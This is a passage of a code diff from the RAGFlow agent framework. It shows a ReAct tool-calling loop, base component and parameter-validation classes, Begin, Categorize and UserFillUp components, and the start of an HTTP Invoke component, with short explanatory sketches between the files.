]):
|
||||||
|
yield delta_ans
|
||||||
|
|
||||||
|
def _react_with_tools_streamly(self, history: list[dict], use_tools):
|
||||||
|
token_count = 0
|
||||||
|
tool_metas = self.tool_meta
|
||||||
|
hist = deepcopy(history)
|
||||||
|
last_calling = ""
|
||||||
|
if len(hist) > 3:
|
||||||
|
user_request = full_question(messages=history, chat_mdl=self.chat_mdl)
|
||||||
|
self.callback("Multi-turn conversation optimization", {}, user_request)
|
||||||
|
else:
|
||||||
|
user_request = history[-1]["content"]
|
||||||
|
|
||||||
        def use_tool(name, args):
            nonlocal hist, use_tools, token_count, last_calling, user_request
            print(f"{last_calling=} == {name=}")
            # Summarize the function call.
            # if all([
            #     isinstance(self.toolcall_session.get_tool_obj(name), Agent),
            #     last_calling,
            #     last_calling != name
            # ]):
            #     self.toolcall_session.get_tool_obj(name).add2system_prompt("The chat history with other agents are as following: \n" + self.get_useful_memory(user_request, str(args["user_prompt"])))
            last_calling = name
            tool_response = self.toolcall_session.tool_call(name, args)
            use_tools.append({
                "name": name,
                "arguments": args,
                "results": tool_response
            })
            # self.callback("add_memory", {}, "...")
            # self.add_memory(hist[-2]["content"], hist[-1]["content"], name, args, str(tool_response))

            return name, tool_response

        def complete():
            nonlocal hist
            need2cite = self._canvas.get_reference()["chunks"] and self._id.find("-->") < 0
            cited = False
            if hist[0]["role"] == "system" and need2cite:
                if len(hist) < 7:
                    hist[0]["content"] += citation_prompt()
                    cited = True
            yield "", token_count

            _hist = hist
            if len(hist) > 12:
                _hist = [hist[0], hist[1], *hist[-10:]]
            entire_txt = ""
            for delta_ans in self._generate_streamly(_hist):
                if not need2cite or cited:
                    yield delta_ans, 0
                entire_txt += delta_ans
            if not need2cite or cited:
                return

            txt = ""
            for delta_ans in self._gen_citations(entire_txt):
                yield delta_ans, 0
                txt += delta_ans

            self.callback("gen_citations", {}, txt)

        def append_user_content(hist, content):
            if hist[-1]["role"] == "user":
                hist[-1]["content"] += content
            else:
                hist.append({"role": "user", "content": content})

        task_desc = analyze_task(self.chat_mdl, user_request, tool_metas)
        self.callback("analyze_task", {}, task_desc)
        for _ in range(self._param.max_rounds + 1):
            response, tk = next_step(self.chat_mdl, hist, tool_metas, task_desc)
            # self.callback("next_step", {}, str(response)[:256] + "...")
            token_count += tk
            hist.append({"role": "assistant", "content": response})
            try:
                functions = json_repair.loads(re.sub(r"```.*", "", response))
                if not isinstance(functions, list):
                    raise TypeError(f"A list should be returned, but got `{functions}`")
                for f in functions:
                    if not isinstance(f, dict):
                        raise TypeError(f"An object type should be returned, but got `{f}`")
                with ThreadPoolExecutor(max_workers=5) as executor:
                    thr = []
                    for func in functions:
                        name = func["name"]
                        args = func["arguments"]
                        if name == COMPLETE_TASK:
                            append_user_content(hist, f"Respond with a formal answer. FORGET (DO NOT mention) `{COMPLETE_TASK}`. The language of the response MUST be the same as that of the first user request.\n")
                            for txt, tkcnt in complete():
                                yield txt, tkcnt
                            return

                        thr.append(executor.submit(use_tool, name, args))

                    reflection = reflect(self.chat_mdl, hist, [th.result() for th in thr])
                    append_user_content(hist, reflection)
                    self.callback("reflection", {}, str(reflection))

            except Exception as e:
                logging.exception(msg=f"Wrong JSON argument format in LLM ReAct response: {e}")
                e = f"\nTool call error, please correct the input parameters according to the response format and call it again.\n *** Exception ***\n{e}"
                append_user_content(hist, str(e))

        logging.warning(f"Exceeded max rounds: {self._param.max_rounds}")
        final_instruction = f"""
{user_request}

IMPORTANT: You have reached the conversation limit. Based on ALL the information and research you have gathered so far, please provide a DIRECT and COMPREHENSIVE final answer to the original request.

Instructions:
1. SYNTHESIZE all information collected during this conversation
2. Provide a COMPLETE response using existing data - do not suggest additional research
3. Structure your response as a FINAL DELIVERABLE, not a plan
4. If information is incomplete, state what you found and provide the best analysis possible with available data
5. DO NOT mention conversation limits or suggest further steps
6. Focus on delivering VALUE with the information already gathered

Respond immediately with your final comprehensive answer.
"""
        append_user_content(hist, final_instruction)

        for txt, tkcnt in complete():
            yield txt, tkcnt

    def get_useful_memory(self, goal: str, sub_goal: str, topn=3) -> str:
        # self.callback("get_useful_memory", {"topn": 3}, "...")
        mems = self._canvas.get_memory()
        rank = rank_memories(self.chat_mdl, goal, sub_goal, [summ for (user, assist, summ) in mems])
        try:
            rank = json_repair.loads(re.sub(r"```.*", "", rank))[:topn]
            mems = [mems[r] for r in rank]
            return "\n\n".join([f"User: {u}\nAgent: {a}" for u, a, _ in mems])
        except Exception as e:
            logging.exception(e)

        return "Error occurred."
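The round structure above (parse the LLM's JSON plan, dispatch tool calls in a thread pool, reflect, stop on the completion sentinel) is easier to see in isolation. Below is a minimal, self-contained sketch of the same pattern; `TOOLS`, `COMPLETE_TASK` and `plan()` are hypothetical stand-ins for the canvas machinery, not part of the diff.

# Minimal sketch of the parse -> dispatch -> reflect round used above.
# `TOOLS`, `COMPLETE_TASK` and `plan()` are hypothetical stand-ins.
import json
from concurrent.futures import ThreadPoolExecutor

COMPLETE_TASK = "complete_task"
TOOLS = {"add": lambda a, b: a + b}

def plan(round_no: int) -> str:
    # A real agent would ask the LLM; here we hard-code two rounds.
    if round_no == 0:
        return json.dumps([{"name": "add", "arguments": {"a": 1, "b": 2}}])
    return json.dumps([{"name": COMPLETE_TASK, "arguments": {}}])

def react(max_rounds: int = 3) -> list:
    history = []
    for i in range(max_rounds):
        calls = json.loads(plan(i))  # the LLM must return a JSON list of calls
        if any(c["name"] == COMPLETE_TASK for c in calls):
            return history           # same stop criterion as the loop above
        with ThreadPoolExecutor(max_workers=5) as ex:
            futs = [(c, ex.submit(TOOLS[c["name"]], **c["arguments"])) for c in calls]
            history.extend({"call": c, "result": f.result()} for c, f in futs)
    return history

print(react())  # [{'call': {...'add'...}, 'result': 3}]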
agent/component/base.py (new file)
@@ -0,0 +1,555 @@
#
#  Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
#
#  Licensed under the Apache License, Version 2.0 (the "License");
#  you may not use this file except in compliance with the License.
#  You may obtain a copy of the License at
#
#      http://www.apache.org/licenses/LICENSE-2.0
#
#  Unless required by applicable law or agreed to in writing, software
#  distributed under the License is distributed on an "AS IS" BASIS,
#  WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
#  See the License for the specific language governing permissions and
#  limitations under the License.
#

import re
import time
from abc import ABC, abstractmethod
import builtins
import json
import os
import logging
from typing import Any, List, Union
import pandas as pd
import trio
from agent import settings
from api.utils.api_utils import timeout


_FEEDED_DEPRECATED_PARAMS = "_feeded_deprecated_params"
_DEPRECATED_PARAMS = "_deprecated_params"
_USER_FEEDED_PARAMS = "_user_feeded_params"
_IS_RAW_CONF = "_is_raw_conf"


class ComponentParamBase(ABC):
    def __init__(self):
        self.message_history_window_size = 22
        self.inputs = {}
        self.outputs = {}
        self.description = ""
        self.max_retries = 0
        self.delay_after_error = 2.0
        self.exception_method = None
        self.exception_default_value = None
        self.exception_goto = None
        self.debug_inputs = {}

    def set_name(self, name: str):
        self._name = name
        return self

    def check(self):
        raise NotImplementedError("Parameter Object should be checked.")

    @classmethod
    def _get_or_init_deprecated_params_set(cls):
        if not hasattr(cls, _DEPRECATED_PARAMS):
            setattr(cls, _DEPRECATED_PARAMS, set())
        return getattr(cls, _DEPRECATED_PARAMS)

    def _get_or_init_feeded_deprecated_params_set(self, conf=None):
        if not hasattr(self, _FEEDED_DEPRECATED_PARAMS):
            if conf is None:
                setattr(self, _FEEDED_DEPRECATED_PARAMS, set())
            else:
                setattr(
                    self,
                    _FEEDED_DEPRECATED_PARAMS,
                    set(conf[_FEEDED_DEPRECATED_PARAMS]),
                )
        return getattr(self, _FEEDED_DEPRECATED_PARAMS)

    def _get_or_init_user_feeded_params_set(self, conf=None):
        if not hasattr(self, _USER_FEEDED_PARAMS):
            if conf is None:
                setattr(self, _USER_FEEDED_PARAMS, set())
            else:
                setattr(self, _USER_FEEDED_PARAMS, set(conf[_USER_FEEDED_PARAMS]))
        return getattr(self, _USER_FEEDED_PARAMS)

    def get_user_feeded(self):
        return self._get_or_init_user_feeded_params_set()

    def get_feeded_deprecated_params(self):
        return self._get_or_init_feeded_deprecated_params_set()

    @property
    def _deprecated_params_set(self):
        return {name: True for name in self.get_feeded_deprecated_params()}

    def __str__(self):
        return json.dumps(self.as_dict(), ensure_ascii=False)

    def as_dict(self):
        def _recursive_convert_obj_to_dict(obj):
            ret_dict = {}
            if isinstance(obj, dict):
                for k, v in obj.items():
                    if isinstance(v, dict) or (v and type(v).__name__ not in dir(builtins)):
                        ret_dict[k] = _recursive_convert_obj_to_dict(v)
                    else:
                        ret_dict[k] = v
                return ret_dict

            for attr_name in list(obj.__dict__):
                if attr_name in [_FEEDED_DEPRECATED_PARAMS, _DEPRECATED_PARAMS, _USER_FEEDED_PARAMS, _IS_RAW_CONF]:
                    continue
                # get attr
                attr = getattr(obj, attr_name)
                if isinstance(attr, pd.DataFrame):
                    ret_dict[attr_name] = attr.to_dict()
                    continue
                if isinstance(attr, dict) or (attr and type(attr).__name__ not in dir(builtins)):
                    ret_dict[attr_name] = _recursive_convert_obj_to_dict(attr)
                else:
                    ret_dict[attr_name] = attr

            return ret_dict

        return _recursive_convert_obj_to_dict(self)

    def update(self, conf, allow_redundant=False):
        update_from_raw_conf = conf.get(_IS_RAW_CONF, True)
        if update_from_raw_conf:
            deprecated_params_set = self._get_or_init_deprecated_params_set()
            feeded_deprecated_params_set = (
                self._get_or_init_feeded_deprecated_params_set()
            )
            user_feeded_params_set = self._get_or_init_user_feeded_params_set()
            setattr(self, _IS_RAW_CONF, False)
        else:
            feeded_deprecated_params_set = (
                self._get_or_init_feeded_deprecated_params_set(conf)
            )
            user_feeded_params_set = self._get_or_init_user_feeded_params_set(conf)

        def _recursive_update_param(param, config, depth, prefix):
            if depth > settings.PARAM_MAXDEPTH:
                raise ValueError("Parameter definitions are nested too deeply; cannot parse them.")

            inst_variables = param.__dict__
            redundant_attrs = []
            for config_key, config_value in config.items():
                # redundant attr
                if config_key not in inst_variables:
                    if not update_from_raw_conf and config_key.startswith("_"):
                        setattr(param, config_key, config_value)
                    else:
                        setattr(param, config_key, config_value)
                        # redundant_attrs.append(config_key)
                    continue

                full_config_key = f"{prefix}{config_key}"

                if update_from_raw_conf:
                    # add user-fed params
                    user_feeded_params_set.add(full_config_key)

                    # update the user-fed deprecated param set
                    if full_config_key in deprecated_params_set:
                        feeded_deprecated_params_set.add(full_config_key)

                # supported attr
                attr = getattr(param, config_key)
                if type(attr).__name__ in dir(builtins) or attr is None:
                    setattr(param, config_key, config_value)
                else:
                    # recursively set obj attrs
                    sub_params = _recursive_update_param(
                        attr, config_value, depth + 1, prefix=f"{prefix}{config_key}."
                    )
                    setattr(param, config_key, sub_params)

            if not allow_redundant and redundant_attrs:
                raise ValueError(
                    f"cpn `{getattr(self, '_name', type(self))}` has redundant parameters: `{[redundant_attrs]}`"
                )

            return param

        return _recursive_update_param(param=self, config=conf, depth=0, prefix="")

    def extract_not_builtin(self):
        def _get_not_builtin_types(obj):
            ret_dict = {}
            for variable in obj.__dict__:
                attr = getattr(obj, variable)
                if attr and type(attr).__name__ not in dir(builtins):
                    ret_dict[variable] = _get_not_builtin_types(attr)

            return ret_dict

        return _get_not_builtin_types(self)

    def validate(self):
        self.builtin_types = dir(builtins)
        self.func = {
            "ge": self._greater_equal_than,
            "le": self._less_equal_than,
            "in": self._in,
            "not_in": self._not_in,
            "range": self._range,
        }
        home_dir = os.path.abspath(os.path.dirname(os.path.realpath(__file__)))
        param_validation_path_prefix = home_dir + "/param_validation/"

        param_name = type(self).__name__
        param_validation_path = "/".join(
            [param_validation_path_prefix, param_name + ".json"]
        )

        validation_json = None

        try:
            with open(param_validation_path, "r") as fin:
                validation_json = json.loads(fin.read())
        except BaseException:
            return

        self._validate_param(self, validation_json)

    def _validate_param(self, param_obj, validation_json):
        default_section = type(param_obj).__name__
        var_list = param_obj.__dict__

        for variable in var_list:
            attr = getattr(param_obj, variable)

            if type(attr).__name__ in self.builtin_types or attr is None:
                if variable not in validation_json:
                    continue

                validation_dict = validation_json[default_section][variable]
                value = getattr(param_obj, variable)
                value_legal = False

                for op_type in validation_dict:
                    if self.func[op_type](value, validation_dict[op_type]):
                        value_legal = True
                        break

                if not value_legal:
                    raise ValueError(
                        "Please check runtime conf: {} = {} does not match the user-parameter restriction".format(
                            variable, value
                        )
                    )

            elif variable in validation_json:
                self._validate_param(attr, validation_json)

    @staticmethod
    def check_string(param, descr):
        if type(param).__name__ not in ["str"]:
            raise ValueError(
                descr + " {} not supported, should be string type".format(param)
            )

    @staticmethod
    def check_empty(param, descr):
        if not param:
            raise ValueError(
                descr + " does not support empty value."
            )

    @staticmethod
    def check_positive_integer(param, descr):
        if type(param).__name__ not in ["int", "long"] or param <= 0:
            raise ValueError(
                descr + " {} not supported, should be positive integer".format(param)
            )

    @staticmethod
    def check_positive_number(param, descr):
        if type(param).__name__ not in ["float", "int", "long"] or param <= 0:
            raise ValueError(
                descr + " {} not supported, should be positive numeric".format(param)
            )

    @staticmethod
    def check_nonnegative_number(param, descr):
        if type(param).__name__ not in ["float", "int", "long"] or param < 0:
            raise ValueError(
                descr
                + " {} not supported, should be non-negative numeric".format(param)
            )

    @staticmethod
    def check_decimal_float(param, descr):
        if type(param).__name__ not in ["float", "int"] or param < 0 or param > 1:
            raise ValueError(
                descr
                + " {} not supported, should be a float number in range [0, 1]".format(
                    param
                )
            )

    @staticmethod
    def check_boolean(param, descr):
        if type(param).__name__ != "bool":
            raise ValueError(
                descr + " {} not supported, should be bool type".format(param)
            )

    @staticmethod
    def check_open_unit_interval(param, descr):
        if type(param).__name__ not in ["float"] or param <= 0 or param >= 1:
            raise ValueError(
                descr + " should be a numeric number between 0 and 1 exclusively"
            )

    @staticmethod
    def check_valid_value(param, descr, valid_values):
        if param not in valid_values:
            raise ValueError(
                descr
                + " {} is not supported, it should be in {}".format(param, valid_values)
            )

    @staticmethod
    def check_defined_type(param, descr, types):
        if type(param).__name__ not in types:
            raise ValueError(
                descr + " {} not supported, should be one of {}".format(param, types)
            )

    @staticmethod
    def check_and_change_lower(param, valid_list, descr=""):
        if type(param).__name__ != "str":
            raise ValueError(
                descr
                + " {} not supported, should be one of {}".format(param, valid_list)
            )

        lower_param = param.lower()
        if lower_param in valid_list:
            return lower_param
        else:
            raise ValueError(
                descr
                + " {} not supported, should be one of {}".format(param, valid_list)
            )

    @staticmethod
    def _greater_equal_than(value, limit):
        return value >= limit - settings.FLOAT_ZERO

    @staticmethod
    def _less_equal_than(value, limit):
        return value <= limit + settings.FLOAT_ZERO

    @staticmethod
    def _range(value, ranges):
        in_range = False
        for left_limit, right_limit in ranges:
            if (
                left_limit - settings.FLOAT_ZERO
                <= value
                <= right_limit + settings.FLOAT_ZERO
            ):
                in_range = True
                break

        return in_range

    @staticmethod
    def _in(value, right_value_list):
        return value in right_value_list

    @staticmethod
    def _not_in(value, wrong_value_list):
        return value not in wrong_value_list

    def _warn_deprecated_param(self, param_name, descr):
        if self._deprecated_params_set.get(param_name):
            logging.warning(
                f"{descr} {param_name} is deprecated and ignored in this version."
            )

    def _warn_to_deprecate_param(self, param_name, descr, new_param):
        if self._deprecated_params_set.get(param_name):
            logging.warning(
                f"{descr} {param_name} will be deprecated in future release; "
                f"please use {new_param} instead."
            )
            return True
        return False

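The heart of `update()` is the recursive rule: builtin-typed attributes are overwritten from the config, object-typed attributes recurse. A toy, hypothetical rendering of just that rule (the real method additionally tracks deprecated and user-fed key sets, depth limits, and redundancy checks):

# Hypothetical sketch of the recursive-update idea in ComponentParamBase.update():
# builtin-typed attributes are overwritten, object-typed attributes recurse.
import builtins

class SubParam:
    def __init__(self):
        self.top_n = 5

class ToyParam:
    def __init__(self):
        self.name = "retrieval"
        self.sub = SubParam()

def recursive_update(param, conf: dict):
    for key, value in conf.items():
        attr = getattr(param, key, None)
        if attr is None or type(attr).__name__ in dir(builtins):
            setattr(param, key, value)     # builtin-typed: overwrite directly
        else:
            recursive_update(attr, value)  # object-typed: recurse into it
    return param

p = recursive_update(ToyParam(), {"name": "kb_search", "sub": {"top_n": 8}})
print(p.name, p.sub.top_n)  # kb_search 8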
class ComponentBase(ABC):
    component_name: str
    thread_limiter = trio.CapacityLimiter(int(os.environ.get('MAX_CONCURRENT_CHATS', 10)))
    variable_ref_patt = r"\{* *\{([a-zA-Z:0-9]+@[A-Za-z:0-9_.-]+|sys\.[a-z_]+)\} *\}*"

    def __str__(self):
        """
        {
            "component_name": "Begin",
            "params": {}
        }
        """
        return """{{
            "component_name": "{}",
            "params": {}
        }}""".format(self.component_name, self._param)

    def __init__(self, canvas, id, param: ComponentParamBase):
        from agent.canvas import Canvas  # Local import to avoid cyclic dependency
        assert isinstance(canvas, Canvas), "canvas must be an instance of Canvas"
        self._canvas = canvas
        self._id = id
        self._param = param
        self._param.check()

    def invoke(self, **kwargs) -> dict[str, Any]:
        self.set_output("_created_time", time.perf_counter())
        try:
            self._invoke(**kwargs)
        except Exception as e:
            if self.get_exception_default_value():
                self.set_exception_default_value()
            else:
                self.set_output("_ERROR", str(e))
            logging.exception(e)
        self._param.debug_inputs = {}
        self.set_output("_elapsed_time", time.perf_counter() - self.output("_created_time"))
        return self.output()

    @timeout(os.environ.get("COMPONENT_EXEC_TIMEOUT", 10*60))
    def _invoke(self, **kwargs):
        raise NotImplementedError()

    def output(self, var_nm: str = None) -> Union[dict[str, Any], Any]:
        if var_nm:
            return self._param.outputs.get(var_nm, {}).get("value", "")
        return {k: o.get("value") for k, o in self._param.outputs.items()}

    def set_output(self, key: str, value: Any):
        if key not in self._param.outputs:
            self._param.outputs[key] = {"value": None, "type": str(type(value))}
        self._param.outputs[key]["value"] = value

    def error(self):
        return self._param.outputs.get("_ERROR", {}).get("value")

    def reset(self):
        for k in self._param.outputs.keys():
            self._param.outputs[k]["value"] = None
        for k in self._param.inputs.keys():
            self._param.inputs[k]["value"] = None
        self._param.debug_inputs = {}

    def get_input(self, key: str = None) -> Union[Any, dict[str, Any]]:
        if key:
            return self._param.inputs.get(key, {}).get("value")

        res = {}
        for var, o in self.get_input_elements().items():
            v = self.get_param(var)
            if v is None:
                continue
            if isinstance(v, str) and self._canvas.is_reff(v):
                self.set_input_value(var, self._canvas.get_variable_value(v))
            else:
                self.set_input_value(var, v)
            res[var] = self.get_input_value(var)
        return res

    def get_input_values(self) -> Union[Any, dict[str, Any]]:
        if self._param.debug_inputs:
            return self._param.debug_inputs

        return {var: self.get_input_value(var) for var, o in self.get_input_elements().items()}

    def get_input_elements_from_text(self, txt: str) -> dict[str, dict[str, str]]:
        res = {}
        for r in re.finditer(self.variable_ref_patt, txt, flags=re.IGNORECASE):
            exp = r.group(1)
            cpn_id, var_nm = exp.split("@") if exp.find("@") > 0 else ("", exp)
            res[exp] = {
                "name": (self._canvas.get_component_name(cpn_id) + f"@{var_nm}") if cpn_id else exp,
                "value": self._canvas.get_variable_value(exp),
                "_retrival": self._canvas.get_variable_value(f"{cpn_id}@_references") if cpn_id else None,
                "_cpn_id": cpn_id
            }
        return res

    def get_input_elements(self) -> dict[str, Any]:
        return self._param.inputs

    def get_input_form(self) -> dict[str, dict]:
        return self._param.get_input_form()

    def set_input_value(self, key: str, value: Any) -> None:
        if key not in self._param.inputs:
            self._param.inputs[key] = {"value": None}
        self._param.inputs[key]["value"] = value

    def get_input_value(self, key: str) -> Any:
        if key not in self._param.inputs:
            return None
        return self._param.inputs[key].get("value")

    def get_component_name(self, cpn_id) -> str:
        return self._canvas.get_component(cpn_id)["obj"].component_name.lower()

    def get_param(self, name):
        if hasattr(self._param, name):
            return getattr(self._param, name)

    def debug(self, **kwargs):
        return self._invoke(**kwargs)

    def get_parent(self) -> Union[object, None]:
        pid = self._canvas.get_component(self._id).get("parent_id")
        if not pid:
            return
        return self._canvas.get_component(pid)["obj"]

    def get_upstream(self) -> List[str]:
        cpn_nms = self._canvas.get_component(self._id)['upstream']
        return cpn_nms

    @staticmethod
    def string_format(content: str, kv: dict[str, str]) -> str:
        for n, v in kv.items():
            content = re.sub(
                r"\{%s\}" % re.escape(n), v, content
            )
        return content

    def exception_handler(self):
        if not self._param.exception_method:
            return
        return {
            "goto": self._param.exception_goto,
            "default_value": self._param.exception_default_value
        }

    def get_exception_default_value(self):
        if self._param.exception_method != "comment":
            return ""
        return self._param.exception_default_value

    def set_exception_default_value(self):
        self.set_output("result", self.get_exception_default_value())

    @abstractmethod
    def thoughts(self) -> str:
        ...
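The `invoke()` wrapper above times the run, traps exceptions, and either applies the component's default value or records `_ERROR` in the outputs. A stripped-down, hypothetical version of that lifecycle:

# Hypothetical, stripped-down version of the invoke() lifecycle above:
# time the run, trap errors, surface them via the outputs dict.
import time

class ToyComponent:
    def __init__(self):
        self.outputs = {}

    def _invoke(self, **kwargs):
        raise RuntimeError("boom")  # pretend the component failed

    def invoke(self, **kwargs) -> dict:
        self.outputs["_created_time"] = time.perf_counter()
        try:
            self._invoke(**kwargs)
        except Exception as e:
            self.outputs["_ERROR"] = str(e)  # same convention as set_output("_ERROR", ...)
        self.outputs["_elapsed_time"] = time.perf_counter() - self.outputs["_created_time"]
        return self.outputs

print(ToyComponent().invoke())  # {'_created_time': ..., '_ERROR': 'boom', '_elapsed_time': ...}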
agent/component/begin.py (new file)
@@ -0,0 +1,49 @@
# Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
# Licensed under the Apache License, Version 2.0 (the "License"); full header as in agent/component/base.py above.

from agent.component.fillup import UserFillUpParam, UserFillUp


class BeginParam(UserFillUpParam):

    """
    Define the Begin component parameters.
    """
    def __init__(self):
        super().__init__()
        self.mode = "conversational"
        self.prologue = "Hi! I'm your smart assistant. What can I do for you?"

    def check(self):
        self.check_valid_value(self.mode, "The 'mode' should be either `conversational` or `task`", ["conversational", "task"])

    def get_input_form(self) -> dict[str, dict]:
        return getattr(self, "inputs")


class Begin(UserFillUp):
    component_name = "Begin"

    def _invoke(self, **kwargs):
        for k, v in kwargs.get("inputs", {}).items():
            if isinstance(v, dict) and v.get("type", "").lower().find("file") >= 0:
                v = self._canvas.get_files([v["value"]])
            else:
                v = v.get("value")
            self.set_output(k, v)
            self.set_input_value(k, v)

    def thoughts(self) -> str:
        return ""
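The `_invoke` above routes file-typed inputs through the canvas and unwraps plain values to their `value` field. A hypothetical sketch of that unwrapping rule, with `load_file` standing in for `self._canvas.get_files`:

# Hypothetical sketch of the input-unwrapping rule in Begin._invoke above.
def unwrap(inputs: dict, load_file=lambda ref: f"<contents of {ref}>") -> dict:
    out = {}
    for k, v in inputs.items():
        if isinstance(v, dict) and "file" in v.get("type", "").lower():
            out[k] = load_file(v["value"])  # file-typed: resolve to file contents
        elif isinstance(v, dict):
            out[k] = v.get("value")         # plain input: reduce to its value
        else:
            out[k] = v
    return out

print(unwrap({"resume": {"type": "file", "value": "doc-1"},
              "name": {"type": "line", "value": "Alice"}}))
# {'resume': '<contents of doc-1>', 'name': 'Alice'}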
agent/component/categorize.py (new file)
@@ -0,0 +1,137 @@
# Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
# Licensed under the Apache License, Version 2.0 (the "License"); full header as in agent/component/base.py above.

import logging
import os
import re
from abc import ABC

from api.db import LLMType
from api.db.services.llm_service import LLMBundle
from agent.component.llm import LLMParam, LLM
from api.utils.api_utils import timeout
from rag.llm.chat_model import ERROR_PREFIX


class CategorizeParam(LLMParam):

    """
    Define the Categorize component parameters.
    """
    def __init__(self):
        super().__init__()
        self.category_description = {}
        self.query = "sys.query"
        self.message_history_window_size = 1
        self.update_prompt()

    def check(self):
        self.check_positive_integer(self.message_history_window_size, "[Categorize] Message window size > 0")
        self.check_empty(self.category_description, "[Categorize] Category examples")
        for k, v in self.category_description.items():
            if not k:
                raise ValueError("[Categorize] Category name can not be empty!")
            if not v.get("to"):
                raise ValueError(f"[Categorize] 'To' of category {k} can not be empty!")

    def get_input_form(self) -> dict[str, dict]:
        return {
            "query": {
                "type": "line",
                "name": "Query"
            }
        }

    def update_prompt(self):
        cate_lines = []
        for c, desc in self.category_description.items():
            for line in desc.get("examples", []):
                if not line:
                    continue
                cate_lines.append("USER: \"" + re.sub(r"\n", " ", line, flags=re.DOTALL) + "\" → " + c)

        descriptions = []
        for c, desc in self.category_description.items():
            if desc.get("description"):
                descriptions.append(
                    "\n------\nCategory: {}\nDescription: {}".format(c, desc["description"]))

        self.sys_prompt = """
You are an advanced classification system that categorizes user questions into specific types. Analyze the input question and classify it into ONE of the following categories:
{}

Here's the description of each category:
 - {}

---- Instructions ----
 - Consider both explicit mentions and implied context
 - Prioritize the most specific applicable category
 - Return only the category name without explanations
 - Use "Other" only when no other category fits

""".format(
            "\n - ".join(list(self.category_description.keys())),
            "\n".join(descriptions)
        )

        if cate_lines:
            self.sys_prompt += """
---- Examples ----
{}
""".format("\n".join(cate_lines))


class Categorize(LLM, ABC):
    component_name = "Categorize"

    @timeout(os.environ.get("COMPONENT_EXEC_TIMEOUT", 10*60))
    def _invoke(self, **kwargs):
        msg = self._canvas.get_history(self._param.message_history_window_size)
        if not msg:
            msg = [{"role": "user", "content": ""}]
        if kwargs.get("sys.query"):
            msg[-1]["content"] = kwargs["sys.query"]
            self.set_input_value("sys.query", kwargs["sys.query"])
        else:
            msg[-1]["content"] = self._canvas.get_variable_value(self._param.query)
            self.set_input_value(self._param.query, msg[-1]["content"])
        self._param.update_prompt()
        chat_mdl = LLMBundle(self._canvas.get_tenant_id(), LLMType.CHAT, self._param.llm_id)

        user_prompt = """
---- Real Data ----
{} →
""".format(" | ".join(["{}: \"{}\"".format(c["role"].upper(), re.sub(r"\n", "", c["content"], flags=re.DOTALL)) for c in msg]))
        ans = chat_mdl.chat(self._param.sys_prompt, [{"role": "user", "content": user_prompt}], self._param.gen_conf())
        logging.info(f"input: {user_prompt}, answer: {str(ans)}")
        if ERROR_PREFIX in ans:
            raise Exception(ans)
        # Count the number of times each category appears in the answer.
        category_counts = {}
        for c in self._param.category_description.keys():
            count = ans.lower().count(c.lower())
            category_counts[c] = count

        # Defaults: the last category's route and the first category's name.
        cpn_ids = list(self._param.category_description.items())[-1][1]["to"]
        max_category = list(self._param.category_description.keys())[0]
        if any(category_counts.values()):
            max_category = max(category_counts.items(), key=lambda x: x[1])[0]
            cpn_ids = self._param.category_description[max_category]["to"]

        self.set_output("category_name", max_category)
        self.set_output("_next", cpn_ids)

    def thoughts(self) -> str:
        return "Which category should it fall into: {}? ...".format(",".join([f"`{c}`" for c, _ in self._param.category_description.items()]))
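The category is picked by counting how often each label appears in the raw LLM answer, which tolerates chatty responses that do more than return a bare label. A minimal sketch of that selection rule (the labels and routing table are made up):

# Minimal sketch of the count-based category selection in Categorize._invoke above.
routing = {"billing": ["cpn_billing"], "tech": ["cpn_tech"], "other": ["cpn_other"]}

def pick(ans: str) -> tuple[str, list[str]]:
    counts = {c: ans.lower().count(c.lower()) for c in routing}
    category = list(routing)[0]              # default: first category's name
    next_cpns = list(routing.values())[-1]   # default: last category's route
    if any(counts.values()):
        category = max(counts, key=counts.get)
        next_cpns = routing[category]
    return category, next_cpns

print(pick("This looks like a TECH question about drivers."))  # ('tech', ['cpn_tech'])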
agent/component/fillup.py (new file)
@@ -0,0 +1,40 @@
# Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
# Licensed under the Apache License, Version 2.0 (the "License"); full header as in agent/component/base.py above.

from agent.component.base import ComponentBase, ComponentParamBase


class UserFillUpParam(ComponentParamBase):

    def __init__(self):
        super().__init__()
        self.enable_tips = True
        self.tips = "Please fill up the form"

    def check(self) -> bool:
        return True


class UserFillUp(ComponentBase):
    component_name = "UserFillUp"

    def _invoke(self, **kwargs):
        for k, v in kwargs.get("inputs", {}).items():
            self.set_output(k, v)

    def thoughts(self) -> str:
        return "Waiting for your input..."
agent/component/invoke.py (new file)
@@ -0,0 +1,142 @@
# Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
# Licensed under the Apache License, Version 2.0 (the "License"); full header as in agent/component/base.py above.

import json
import logging
import os
import re
import time
from abc import ABC
import requests

from api.utils.api_utils import timeout
from deepdoc.parser import HtmlParser
from agent.component.base import ComponentBase, ComponentParamBase


class InvokeParam(ComponentParamBase):
    """
    Define the Invoke component parameters.
    """

    def __init__(self):
        super().__init__()
        self.proxy = None
        self.headers = ""
        self.method = "get"
        self.variables = []
        self.url = ""
        self.timeout = 60
        self.clean_html = False
        self.datatype = "json"  # New parameter to determine the data-posting type

    def check(self):
        self.check_valid_value(self.method.lower(), "HTTP method of the request", ['get', 'post', 'put'])
        self.check_empty(self.url, "End point URL")
        self.check_positive_integer(self.timeout, "Timeout in seconds")
        self.check_boolean(self.clean_html, "Clean HTML")
        self.check_valid_value(self.datatype.lower(), "Data post type", ['json', 'formdata'])  # Check for a valid datatype value


class Invoke(ComponentBase, ABC):
    component_name = "Invoke"

    @timeout(os.environ.get("COMPONENT_EXEC_TIMEOUT", 3))
    def _invoke(self, **kwargs):
        args = {}
        for para in self._param.variables:
            if para.get("value") is not None:
                args[para["key"]] = para["value"]
            else:
                args[para["key"]] = self._canvas.get_variable_value(para["ref"])

        url = self._param.url.strip()
        if url.find("http") != 0:
            url = "http://" + url

        method = self._param.method.lower()
        headers = {}
        if self._param.headers:
            headers = json.loads(self._param.headers)
        proxies = None
        if re.sub(r"https?:?/?/?", "", self._param.proxy):
            proxies = {"http": self._param.proxy, "https": self._param.proxy}

        last_e = ""
        for _ in range(self._param.max_retries + 1):
            try:
                if method == 'get':
                    response = requests.get(url=url,
                                            params=args,
                                            headers=headers,
                                            proxies=proxies,
                                            timeout=self._param.timeout)
                    if self._param.clean_html:
                        sections = HtmlParser()(None, response.content)
                        self.set_output("result", "\n".join(sections))
                    else:
                        self.set_output("result", response.text)

                if method == 'put':
